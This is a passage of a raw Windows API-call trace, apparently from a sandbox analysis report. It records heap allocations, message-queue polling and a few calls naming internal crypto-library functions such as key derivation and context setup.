[0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.466] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0250.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0250.467] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54eb8 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0250.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.468] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0250.468] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.468] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0250.468] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0250.469] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0250.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0250.469] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.469] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.469] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0250.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0250.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0250.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0250.536] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0250.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0250.537] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0250.537] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0250.537] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0250.537] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0250.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0250.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0250.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0250.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.540] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0250.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0250.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0250.541] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0250.541] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0250.541] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0250.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.542] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.542] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.542] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0250.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0250.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0250.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0250.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0250.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.543] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0250.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.543] 